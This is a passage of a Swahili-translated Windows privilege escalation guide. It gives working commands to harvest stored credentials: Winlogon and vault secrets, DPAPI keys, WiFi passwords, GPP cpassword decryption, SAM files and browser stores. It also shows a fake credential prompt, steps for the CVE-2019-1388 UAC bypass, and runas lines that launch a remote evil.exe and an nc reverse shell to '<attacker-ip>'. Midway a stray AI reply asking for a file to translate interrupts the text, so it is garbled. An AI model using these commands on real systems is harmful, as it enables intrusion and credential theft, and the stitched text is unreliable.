Iwapo una write permissions inside a folder present on PATH, unaweza hijack a DLL iliyopakiwa na process na escalate privileges.

Angalia ruhusa za folda zote ndani ya PATH:

bash

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu:

Writable Sys Path +Dll Hijacking Privesc

Mtandao

Sehemu zilizosharikiwa

bash

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Angalia kompyuta zingine zilizojulikana zilizowekwa hardcoded kwenye hosts file

type C:\Windows\System32\drivers\etc\hosts

Miunganisho ya Mtandao & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Bandari wazi

Angalia uwepo wa huduma zilizozuiliwa kutoka nje

bash

netstat -ano #Opened ports?

Jedwali la Njia

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Jedwali

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Kanuni za Firewall

Check this page for Firewall related commands (orodhesha kanuni, tengeneza kanuni, zima, zima...)

Zaidi commands for network enumeration here

Windows Subsystem for Linux (wsl)

bash

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Faili binari bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Ikiwa unapata mtumiaji root, unaweza kusikiliza kwenye bandari yoyote (mara ya kwanza unapotumia nc.exe kusikiliza kwenye bandari itakuuliza kupitia GUI ikiwa nc inapaswa kuruhusiwa na firewall).

bash

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Ili kuanza bash kama root kwa urahisi, unaweza kujaribu --default-user root

Unaweza kuchunguza mfumo wa faili wa WSL katika kabrasha C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows Vyeti vya Kuingia

Vyeti vya Winlogon

bash

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

Kutoka https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows Vault inahifadhi nyaraka za uthibitisho (credentials) za watumiaji kwa seva, tovuti na programu nyingine ambazo Windows can log in the users automatically. Mwanzo inaweza kuonekana kwamba watumiaji wanaweza kuhifadhi credentials zao za Facebook, Twitter, Gmail n.k., ili waingie moja kwa moja kupitia browsers. Lakini si hivyo.

Windows Vault inahifadhi credentials ambazo Windows inatumia kuingia watumiaji moja kwa moja, ambayo ina maana kwamba programu yoyote ya Windows application that needs credentials to access a resource (server au tovuti) can make use of this Credential Manager & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nywila kila wakati.

Isipokuwa programu zinavyoshirikiana na Credential Manager, sidhani inawezekana kwao kutumia credentials za rasilimali fulani. Hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani communicate with the credential manager and request the credentials for that resource kutoka kwa default storage vault.

Tumia cmdkey kuorodhesha credentials zilizohifadhiwa kwenye mashine.

bash

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Kisha unaweza kutumia runas kwa chaguo la /savecred ili kutumia maelezo ya kuingia yaliyohifadhiwa. Mfano ufuatao unaita binary ya mbali kupitia SMB share.

bash

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Kutumia runas na seti ya credential iliyotolewa.

bash

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka kwa Empire Powershells module.

DPAPI

The API ya Ulinzi wa Data (DPAPI) inatoa njia ya symmetric encryption ya data, inayotumika hasa ndani ya mfumo wa uendeshaji Windows kwa symmetric encryption ya funguo binafsi za asymmetric. Encryption hii inategemea siri ya mtumiaji au ya mfumo ili kuongeza kwa kiasi kikubwa entropi.

DPAPI inaruhusu encryption ya funguo kupitia funguo ya symmetric inayotokana na siri za kuingia za mtumiaji. Katika matukio yanayohusisha encryption ya mfumo, inatumia siri za uthibitishaji za domain ya mfumo.

Funguo za RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zinahifadhiwa katika saraka %APPDATA%\Microsoft\Protect\{SID}, ambapo {SID} inawakilisha Security Identifier ya mtumiaji. Ufunguo wa DPAPI, ulioko pamoja na funguo kuu inayolinda funguo binafsi za mtumiaji katika faili hiyo hiyo, kwa kawaida unaundwa na 64 bytes za data nasibu. (Ni muhimu kufahamu kwamba ufikiaji wa saraka hii umefichwa, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya dir kwenye CMD, ingawa inaweza kuorodheshwa kupitia PowerShell).

bash

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Unaweza kutumia mimikatz module dpapi::masterkey na hoja zinazofaa (/pvk au /rpc) ili kuifungua.

credentials files protected by the master password hupatikana kwa kawaida katika:

bash

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unaweza kutumia mimikatz module dpapi::cred na /masterkey inayofaa ili kudekripta.
Unaweza extract many DPAPI masterkeys from memory kwa kutumia module sekurlsa::dpapi (ikiwa wewe ni root).

DPAPI - Extracting Passwords

PowerShell Credentials

PowerShell credentials mara nyingi hutumika kwa ajili ya scripting na kazi za automation kama njia ya kuhifadhi encrypted credentials kwa urahisi. Nyaraka hizo zinatengwa na kulindwa kwa kutumia DPAPI, jambo ambalo kwa kawaida lina maana kwamba zinaweza kudekripta tu na mtumiaji huyo huyo kwenye kompyuta ile ile zilizoundwa.

Ili decrypt PS credentials kutoka kwenye faili inayohifadhi unaweza kufanya:

bash

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

bash

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Miunganisho za RDP zilizohifadhiwa

Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\

Amri zilizotekelezwa hivi karibuni

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Meneja wa Cheti za Desktop ya Mbali

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Tumia the Mimikatz dpapi::rdg module na /masterkey inayofaa ili kufungua faili zozote .rdg
Unaweza kutoa masterkey nyingi za DPAPI kutoka kwenye kumbukumbu kwa Mimikatz sekurlsa::dpapi module

Sticky Notes

Watu mara nyingi hutumia app ya StickyNotes kwenye mashine za Windows kuhifadhi nywila na taarifa nyingine, bila kutambua kuwa ni faili la database. Faili hii iko kwenye C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na inastahili kila mara kutafutwa na kuchunguzwa.

AppCmd.exe

Kumbuka kuwa ili kurejesha nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa kiwango cha High Integrity.
AppCmd.exe iko katika saraka %systemroot%\system32\inetsrv\.\
Ikiwa faili hii ipo basi inawezekana kuwa baadhi ya credentials zimesanidiwa na zinaweza kurejeshwa.

Msimbo huu ulitolewa kutoka PowerUP:

bash

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Angalia ikiwa C:\Windows\CCM\SCClient.exe inapatikana .
Wasakinishaji huendeshwa kwa SYSTEM privileges, wengi wao wana udhaifu wa DLL Sideloading (Taarifa kutoka https://github.com/enjoiz/Privesc).

bash

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Faili na Rejista (Credentials)

Putty Creds

bash

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Vifunguo vya Mwenyeji

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

Funguo za SSH kwenye registry

Funguo binafsi za SSH zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys hivyo unapaswa kuangalia kama kuna kitu cha kuvutia huko:

bash

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

Ikiwa utapata kipengee chochote ndani ya njia hiyo, kwa uwezekano ni ufunguo wa SSH uliohifadhiwa. Imehifadhiwa kwa usimbaji lakini inaweza kufunguliwa kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Taarifa zaidi kuhusu mbinu hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

Ikiwa huduma ya ssh-agent haifanyi kazi na unataka ianze kiotomatiki wakati wa boot, endesha:

bash

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

tip

Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda ssh keys, kuziongeza kwa ssh-add na kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon hakutambua matumizi ya dpapi.dll wakati wa uthibitishaji wa funguo zisizo za kulinganisha.

Faili zisizoangaliwa

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Unaweza pia kutafuta faili hizi kwa kutumia metasploit: post/windows/gather/enum_unattend

Mfano wa yaliyomo:

xml

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

Machelezo ya SAM & SYSTEM

bash

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Vyeti vya Wingu

bash

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Tafuta faili inayoitwa SiteList.xml

Cached GPP Pasword

Kipengele kilikuwa kinapatikana hapo awali kilichoruhusu kusambaza akaunti maalum za local administrator kwenye kikundi cha mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zinazohifadhiwa kama faili za XML katika SYSVOL, zinaweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia ufunguo wa default uliotangazwa hadharani, zinaweza kudekripta na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani inaweza kumruhusu mtumiaji kupata vibali vilivyoongezwa.

Ili kupunguza hatari hii, ilitengenezwa kazi inayoscan faili za GPP zilizohifadhiwa kienyeji zenye uwanja wa "cpassword" ambao si tupu. Ikipata faili kama hiyo, kazi hiyo hudekripta nywila na kurudisha custom PowerShell object. Objekti hii inajumuisha maelezo kuhusu GPP na mahali pa faili, ikisaidia katika utambuzi na utatuzi wa udhaifu huu wa usalama.

Tafuta katika C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (kabla ya W Vista) kwa faili hizi:

Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml

Kudekripta cPassword:

bash

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Kutumia crackmapexec kupata passwords:

bash

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Usanidi wa Wavuti

bash

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

bash

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

bash

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Mfano wa web.config lenye credentials:

xml

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

Nyaraka za OpenVPN

csharp

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Marekodi

bash

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Omba credentials

Unaweza kila wakati kumuomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine ikiwa unafikiri anaweza kujua (kumbuka kuwa kuomba mteja moja kwa moja kwa credentials ni kweli hatari):

bash

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Majina ya faili yanayoweza kuwa na maelezo ya kuingia

Faili zilizojulikana ambazo wakati fulani nyuma ziliwapo na nywila kwa maandishi wazi au Base64

bash

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

I don't have access to your files. Please paste the content of src/windows-hardening/windows-local-privilege-escalation/README.md (or the list of files you want searched). Once you provide them I will translate the relevant English text to Swahili, preserving all markdown/HTML/tags and paths.

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Credentials katika RecycleBin

Unapaswa pia kuangalia Bin kutafuta credentials ndani yake.

Ili recover passwords zilizohifadhiwa na programu mbalimbali unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html

Ndani ya registry

Vifunguo vingine vya registry vinaoweza kuwa na credentials

bash

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

Historia za Vivinjari

Unapaswa kuangalia dbs ambapo nywila kutoka Chrome or Firefox zimehifadhiwa.
Pia angalia historia, alama za ukurasa (bookmarks) na vipendwa (favourites) vya vivinjari kwa sababu labda baadhi ya nywila zimehifadhiwa hapo.

Zana za kutoa nywila kutoka kwenye vivinjari:

Mimikatz: dpapi::chrome
SharpWeb
SharpChromium
SharpDPAPI

COM DLL Overwriting

Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu mawasiliano kati ya vipengele vya programu vilivyotengenezwa kwa lugha tofauti. Kila kipengele cha COM kinatambulika kupitia class ID (CLSID) na kila kipengele kinaonyesha utendakazi kupitia interface(s), zitambulishwazo kwa interface IDs (IIDs).

COM classes na interfaces zimetangazwa kwenye registry chini ya HKEY\CLASSES\ROOT\CLSID na HKEY\CLASSES\ROOT\Interface mtawalia. Registry hii imeundwa kwa kuunganisha HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Ndani ya CLSIDs za registry hii unaweza kupata registry mtoto InProcServer32 ambayo ina default value inayorejelea DLL na thamani inayoitwa ThreadingModel ambayo inaweza kuwa Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) au Neutral (Thread Neutral).

Kwa msingi, ikiwa unaweza overwrite yoyote ya DLLs zitakazotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji mwingine.

Ili kujifunza jinsi watakaaji wanavyotumia COM Hijacking kama mekanisimu ya kudumu angalia:

COM Hijacking

Generic Password search in files and registry

Tafuta yaliyomo kwenye faili

bash

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Tafuta faili yenye jina fulani

bash

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Tafuta rejista kwa majina ya funguo na nywila

bash

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Zana zinazotafuta passwords

MSF-Credentials Plugin ni plugin ya msf niliyoitengeneza ili kutekeleza kiotomatiki kila metasploit POST module inayotafuta credentials ndani ya victim.
Winpeas inatafuta kiotomatiki faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa password kutoka kwenye mfumo.

Zana SessionGopher inatafuta sessions, usernames na passwords za zana kadhaa ambazo zinaweka data hii kwa clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

bash

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Fikiria kwamba a process running as SYSTEM open a new process (OpenProcess()) with full access. Mchakato uleule also create a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Kisha, ikiwa una full access to the low privileged process, unaweza kupata open handle to the privileged process created na OpenProcess() na inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).

Named Pipe Client Impersonation

Sehemu za kumbukumbu zinazoshirikiwa, zinazoitwa pipes, zinawezesha mawasiliano ya michakato na uhamisho wa data.

Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. Hii inafanana na architecture ya client/server, ambapo majukumu yamefafanuliwa kama named pipe server na named pipe client.

Wakati data inapotumwa kupitia pipe na client, server iliyoweka pipe ina uwezo wa take on the identity ya client, ikichukulia kuwa ina haki za SeImpersonate. Kutambua privileged process inayoongea kupitia pipe unaweza kuiga kunatoa fursa ya gain higher privileges kwa kuchukua utambulisho wa mchakato huo mara tu unapoingiliana na pipe uliyoanzisha. Kwa maelekezo juu ya jinsi ya kutekeleza aina hii ya shambulio, mwongozo unaofaa unaweza kupatikana here na here.

Pia zifuatazo zana zinaweza intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer

Mengine

File Extensions that could execute stuff in Windows

Angalia ukurasa https://filesec.io/

Monitoring Command Lines for passwords

Unapopata shell kama mtumiaji, kunaweza kuwa na scheduled tasks au michakato mingine inayotekelezwa ambayo pass credentials on the command line. Script hapa chini inakamata process command lines kila sekunde mbili na inalinganisha hali ya sasa na hali ya awali, ikitolea tofauti zozote.

bash

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Kuiba nywila kutoka kwa michakato

Kutoka kwa mtumiaji mwenye vibali vya chini hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

Ikiwa una ufikiaji wa kiolesura cha grafiki (kupitia console au RDP) na UAC imewezeshwa, katika toleo fulani za Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na ruhusa.

Hii inaruhusu kuinua vikosi vya ruhusa na kupita UAC kwa wakati mmoja kwa udhaifu huo huo. Zaidi ya hayo, hakuna hitaji la kusakinisha chochote, na binary inayotumika katika mchakato imewekwa saini na kutolewa na Microsoft.

Baadhi ya mifumo iliyoathirika ni zifuatazo:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Ili exploit vulnerability hii, inahitajika kufanya hatua zifuatazo:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

You have all the necessary files and information in the following GitHub repository:

https://github.com/jas502n/CVE-2019-1388

From Administrator Medium to High Integrity Level / UAC Bypass

Soma hii ili ujifunze kuhusu Integrity Levels:

Integrity Levels

